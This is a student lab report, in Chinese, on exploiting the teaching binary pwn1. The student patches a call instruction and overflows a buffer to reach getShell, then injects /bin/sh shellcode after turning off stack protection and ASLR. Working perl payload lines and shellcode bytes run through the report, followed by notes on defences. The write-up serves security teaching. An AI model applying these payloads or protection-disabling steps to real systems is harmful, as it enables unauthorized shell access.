网络对抗技术Exp1 PC平台逆向破解
一、实践目标
本次实践的对象是一个名为pwn1的linux可执行文件。
该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。实践的目标是想办法运行这个代码片段。
1 实践内容
- 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
- 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
- 注入一个自己制作的shellcode并运行这段shellcode。
2 需要掌握的基础知识
- 熟悉Linux基本操作
- 理解Bof的原理。
- 会使用gdb,vi。
- 指令、参数。
- 理解思路。
2.1 掌握NOP, JNE, JE, JMP, CMP汇编指令的机器码
(1)NOP:NOP指令即“空指令”。执行到NOP指令时,CPU什么也不做,仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。(机器码:90)
(2)JNE:条件转移指令,如果不相等则跳转。(机器码:75)
(3)JE:条件转移指令,如果相等则跳转。(机器码:74)
(4)JMP:无条件转移指令。段内直接短转Jmp short(机器码:EB)段内直接近转移Jmp near(机器码:E9)段内间接转移Jmp word(机器码:FF)段间直接(远)转移Jmp far(机器码:EA)
(5)CMP:比较指令,功能相当于减法指令,只是对操作数之间运算比较,不保存结果。CMP指令执行后,将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。
2.2 补码
计算机中的有符号数有三种表示方法,即原码、反码和补码。三种表示方法均有符号位和数值位两部分,符号位都是用0表示“正”,用1表示“负”,而数值位,三种表示方法各不相同。在计算机系统中,数值一律用补码来表示和存储。原因在于,使用补码,可以将符号位和数值域统一处理;同时,加法和减法也可以统一处理 。
2.3 反汇编指令objdump
2.4 十六进制编辑工具
二、实践过程
1 直接修改程序机器指令,改变程序执行流程
1.1 下载目标文件pwn1,使用readelf
命令来读出整个ELF文件头的内容
可以看到这里是小端模式
1.2 复制pwn1到pwn20191313,对目标文件pwn20191313反汇编objdump -d pwn20191313 | more
1.3 对文件进行查看,找到getShell
、foo
、main
函数的位置,进行分析
-
先看main函数的第4行,"call 8048491
"是汇编指令 - 是说这条指令将调用位于地址8048491处的foo函数;
- 其对应机器指令为“e8 d7ffffff”,e8即跳转之意。
-
本来正常流程,此时此刻EIP的值应该是下条指令的地址,即80484ba,但如一解释e8这条指令呢,CPU就会转而执行 “EIP + d7ffffff”这个位置的指令。“d7ffffff”是补码(这里因为是小端模式),表示-41,41=0x29,80484ba +d7ffffff= 80484ba-0x29正好是8048491这个值,
-
main函数调用foo,对应机器指令为“e8 d7ffffff”,
- 那我们想让它调用getShell,只要修改“d7ffffff”为,"getShell-80484ba"对应的补码就行。
- 用Windows计算器,直接 47d-4ba就能得到补码,是fffffc3。根据小端模式,将指令的目标地址由d7ffffff变为c3ffffff
-
下面我们就修改可执行文件,将其中的call指令的目标地址由d7ffffff变为c3ffffff。
1.3 修改可执行文件,将其中的call指令的目标地址由d7ffffff变为c3ffffff。
根据老师的步骤,对目标文件pwn20191313进行修改
1.按ESC键
2.输入如下,将显示模式切换为16进制模式
:%!xxd
3.查找要修改的内容
/e8d7
4.找到后前后的内容和反汇编的对比下,确认是地方是正确的
5.修改d7为c3
6.转换16进制为原格式
:%!xxd -r
7.存盘退出vi
:wq
1.4 再反汇编看一下,call指令是否正确调用getShell
objdump -d pwn20191313 | more
1.5 运行下改后的代码,会得到shell提示符,和未修改的代码进行对比。
./pwn1
./pwn20191313
2 通过构造输入参数,造成BOF攻击,改变程序执行流
2.1 反汇编,了解程序的基本功能
注意这个函数getShell
,我们的目标是触发这个函数
该可执行文件正常运行是调用如下函数foo
,这个函数有Buffer overflow漏洞
这里读入字符串,但系统只预留了28字节的缓冲区,超出部分会造成溢出,我们的目标是覆盖返回地址
上面的call调用foo,同时在堆栈上压上返回地址值:80484ba
2.2 确认输入字符串哪几个字符会覆盖到返回地址
这里需要安装gdb,根据课题负责人博客中的命令进行相应安装(如果是普通用户命令需要加上sudo)
sudo chmod a+w /etc/apt/sources.list
sudo chmod a-w /etc/apt/sources.list
sudo apt-get update
sudo apt-get install gdb
在输入sudo apt-get install gdb
出现这样的问题,无法安装gdb。
根据提示输入sudo apt --fix-broken install
再重新安装gdb即可成功。
根据实验指导书上的步骤进行分析,当输入的为1111111122222222333333334444444455555555可以看到eip的值0x35353535也就是5555的ASCII码
如果输入字符串1111111122222222333333334444444412345678,那 1234 那四个数最终会覆盖到堆栈上的返回地址,进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为 getShell 的内存地址,输给pwn1,pwn1就会运行getShell。
2.3 确认用什么值来覆盖返回地址
getShell的内存地址,通过反汇编时可以看到,即0804847d。
接下来要确认下字节序,简单说是输入11111111222222223333333344444444\x08\x04\x84\x7d,还是输入11111111222222223333333344444444\x7d\x84\x04\x08。
对比之前 eip 0x34333231 0x34333231 ,正确应用输入11111111222222223333333344444444\x7d\x84\x04\x08。
2.4 构造输入字符串
由为我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值,所以先生成包括这样字符串的一个文件。\x0a表示回车,如果没有的话,在程序运行时就需要手工按一下回车键。
perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
关于Perl: Perl是一门解释型语言,不需要预编译,可以在命令行上直接使用。 使用输出重定向“>”将perl生成的字符串存储到文件input中。
可以使用16进制查看指令xxd查看input文件的内容是否如预期。
然后将input的输入,通过管道符“|”,作为目标文件pwn20191313的输入。命令为(cat input; cat) | ./pwn20191313
3 注入Shellcode并执行
3.1 准备一段Shellcode
- shellcode就是一段机器指令(code)
- 通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),
- 所以这段机器指令被称为shellcode。
- 在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。
实践即使用该文章(http://www.cnblogs.com/xxy745214935/p/6477120.html, 链接已失效) 生成的shellcode。如下:
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\
3.2 准备工作
修改设置
execstack -s pwn20191313 //设置堆栈可执行
execstack -q pwn20191313 //查询文件的堆栈是否可执行
echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
若提示execstack命令不存在execstack: command not found
,则需安装prelink软件包(云班课资源)。根据老师给出的解决方法进行安装。
具体步骤代码
1、sudo apt-get install libelf-dev
2、./configure
3、make
4、sudo make install
重新运行后成功
当输入echo "0" > /proc/sys/kernel/randomize_va_space
这条命令,如果在普通用户下运行无法成功,需要用root权限
3.3 构造要注入的payload
-
Linux下有两种基本构造攻击buf的方法:
- retaddr+nop+shellcode
- nop+shellcode+retaddr。
-
因为retaddr在缓冲区的位置是固定的,shellcode要不在它前面,要不在它后面。
-
简单说缓冲区小就把shellcode放后边,缓冲区大就把shellcode放前边
-
我们这个buf够放这个shellcode了
-
结构为:nops+shellcode+retaddr。
- nop一为是了填充,二是作为“着陆区/滑行区”。
- 我们猜的返回地址只要落在任何一个nop上,自然会滑到我们的shellcode。
perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode
上面最后的\x4\x3\x2\x1将覆盖到堆栈上的返回地址的位置。我们得把它改为这段shellcode的地址。特别提醒:最后一个字符千万不能是\x0a。不然下面的操作就做不了了。
3.4 确定\x4\x3\x2\x1到底该填什么
打开一个终端注入这段攻击buf
(cat input_shellcode;cat) | ./pwn20191313
再开另外一个终端,用gdb来调试pwn20191313这个进程。
找到目标文件pwn20191313的进程号为142856,随后启动gdb进行调试。
通过设置断点,来查看注入buf的内存地址
在另外一个终端中按下回车,再输入c(即continue那一步)。
此处我的esp值为ffffd1ec
看到 01020304了,再往前找
看到9090310c了,再往前一点
从这开始就是我们的Shellcode
这个返回地址占位也是对的
将返回地址改为0xffffd1d0
perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\xd0\xd1\xff\xff\x00"' > input_shellcode
没成功
查找原因。同上面步骤运行,gdb单步调试。
跳坑ing
3.5 重新开始
结构为:anything+retaddr+nops+shellcode。
0xffffd1ec看到 01020304了,就是返回地址的位置。shellcode就挨着,所以地址是 0xffffd1ec+4=0xffffd1f0
perl -e 'print "A" x 32;print "\xf0\xd1\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
成功了!
是不是很简单?是不是很简单?是不是很简单?
如果你觉得的“是”,注意这个事实:以上实践是在非常简单的一个预设条件下完成的:
(1)关闭堆栈保护(gcc -fno-stack-protector)
(2)关闭堆栈执行保护(execstack -s)
(3)关闭地址随机化 (/proc/sys/kernel/randomize_va_space=0)
(4)在x32环境下
(5)在Linux实践环境
3.6 结合nc模拟远程攻击
本例中是在同一台主机上做的实验;该实验最好在互相连通的两台Linux上做,将ip地址替换为主机1的IP即可。
主机1,模拟一个有漏洞的网络服务:
主机2,连接主机1并发送攻击载荷:
内存中的地址会改变
0xffffd20c+4=0xffffd210
perl -e 'print "A" x 32;print "\x10\xd2\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
重新修改shellcode,并注入。成功。
4 Bof攻击防御技术
4.1. 从防止注入的角度。
在编译时,编译器在每次函数调用前后都加入一定的代码,用来设置和检测堆栈上设置的特定数字,以确认是否有bof攻击发生。
4.2. 注入入了也不让运行。
结合CPU的页面管理机制,通过DEP/NX用来将堆栈内存区设置为不可执行。这样即使是注入的shellcode到堆栈上,也执行不了。
通过execstack -s pwn1 来设置堆栈可执行
通过execstack -q pwn1 来查询文件的堆栈是否可执行
/proc/sys/kernel/randomize_va_space用于控制Linux下内存地址随机化机制(address space layout randomization),有以下三种情况
0 - 表示关闭进程地址空间随机化。
1 - 表示将mmap的基址,stack和vdso页面随机化。
2 - 表示在1的基础上增加栈(heap)的随机化。
4.3. 增加shellcode的构造难度。
shellcode中需要猜测返回地址的位置,需要猜测shellcode注入后的内存位置。这些都极度依赖一个事实:应用的代码段、堆栈段每次都被OS放置到固定的内存地址。ALSR,地址随机化就是让OS每次都用不同的地址加载应用。这样通过预先反汇编或调试得到的那些地址就都不正确了。
4.4 从管理的角度
加强编码质量。注意边界检测。使用最新的安全的库函数。
5 总结
这次进行缓冲区溢出相关知识的实验,让我对缓冲区溢出的原理以及相应的三种攻击方法有了更加深入的体会和了解。纸上得来终觉浅,之前对缓冲区溢出主要还是停留在概念上,这次虽说是在非常“理想”的环境下实现的,毕竟想要在现实中利用漏洞实现缓冲区溢出攻击,还是有点难度,但还是让我认识到这类漏洞的危险性。同时通过这次实验,让我对Linux系统的使用更加熟悉,对linux的各种命令有了更深入的了解。实验过程中虽说遇到了许多问题,但这样的情况已经习惯了,只要用心解决,办法总比困难多。
参考资料:
gdb下载
https://blog.csdn.net/qq_42983283/article/details/109444694
无法解析域名的问题
https://www.cnblogs.com/LilRind/p/13509038.html